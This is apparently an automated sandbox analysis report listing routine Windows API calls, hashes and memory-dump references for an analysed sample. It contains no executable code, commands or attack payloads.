                                                    • API String ID: 823142352-0
                                                    • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                    • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                    • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                    • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                    • Instruction ID: 6c88cd9b3502ecc0d8ec22600fa2d9d68314b02b8b7bc0d4dcd5a0b3e687a907
                                                    • Opcode Fuzzy Hash: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                    • Instruction Fuzzy Hash: 62E0E570300304BFDB01EB62AC82A5EBFECDB45704BA14876B400A7242D5785E008418
                                                    APIs
                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FormatMessage
                                                    • String ID:
                                                    • API String ID: 1306739567-0
                                                    • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                    • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                    • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                    • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                    APIs
                                                    • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF93
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ExtentPointText
                                                    • String ID:
                                                    • API String ID: 566491939-0
                                                    • Opcode ID: 3c55dac69961fee89b68075ba878e24778629f7632fcdab2122717d20327b8c8
                                                    • Instruction ID: 35d5fbc2abb1c5525ca41b455db2da1d0f195ed39a7f49d2ce332ec9d6dfc1ac
                                                    • Opcode Fuzzy Hash: 3c55dac69961fee89b68075ba878e24778629f7632fcdab2122717d20327b8c8
                                                    • Instruction Fuzzy Hash: EEE04FB53096102AD600A67E1DC19DB76DC8E483693148176B458E7292D628DE1242AE
                                                    APIs
                                                    • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                    • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                    • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                    • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                    APIs
                                                    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                    • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                    • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                    • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                    APIs
                                                    • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseFind
                                                    • String ID:
                                                    • API String ID: 1863332320-0
                                                    • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                    • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
                                                    • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                    • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                    • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                    • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                    • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                    • Instruction ID: cfde3e3822fa8edba560b3c3045b88a59d445a8db7eea6df610edd37a4bd72e7
                                                    • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                    • Instruction Fuzzy Hash: A3D012722081516AD220965AAC44EAB6BDCCBC5770F11063AB558C2181D7609C01C675
                                                    APIs
                                                      • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                    • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                      • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$ShowWindow
                                                    • String ID:
                                                    • API String ID: 3202724764-0
                                                    • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                    • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                    • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                    • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                    APIs
                                                    • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID:
                                                    • API String ID: 530164218-0
                                                    • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                    • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                    • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                    • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                    • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                    • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                    • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                    • Instruction ID: 582242be021ecdaa9f487f520a6273a00fb8a2f6ff7a96cbd182f7b59f56d267
                                                    • Opcode Fuzzy Hash: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                    • Instruction Fuzzy Hash: 9EC08CE03222101A9E1069BD2CC521F46C8891823A3A41E3BB528E72D2E23D88262818
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                    • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                    • Opcode Fuzzy Hash: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                    • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                    APIs
                                                    • SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                      • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLast
                                                    • String ID:
                                                    • API String ID: 734332943-0
                                                    • Opcode ID: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                    • Instruction ID: b7b79c15840fa76abef9437e43e4f8825fb2e58c400bd883dda953f657da4aaf
                                                    • Opcode Fuzzy Hash: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                    • Instruction Fuzzy Hash: A9C09BB93011158BDF50E6FEC5C1D0763DC6F5C30A7514166BD04CF207E668DC154B18
                                                    APIs
                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                    • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                    • Opcode Fuzzy Hash: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                    • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                    APIs
                                                    • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                    • Instruction ID: 0a31ae7c3a111c16d424c34ef622fbdc70eb0dd2bd2df7fa5b045972c40067f9
                                                    • Opcode Fuzzy Hash: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                    • Instruction Fuzzy Hash: C5B09B7670C6105DA719DED5B45552D63D4D7C47207E14477F000D2581D97C58014A18
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                    • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                    • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                    • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                    • Instruction ID: 536338a183f72747ee396c39aaf2d9ae1316c242f91420f2fc1fbbab771670b7
                                                    • Opcode Fuzzy Hash: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                    • Instruction Fuzzy Hash: 73519770E042099FEB00EFA5C892AAEBBF5EF49714F50417AE504E7351DB389E41CB98
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
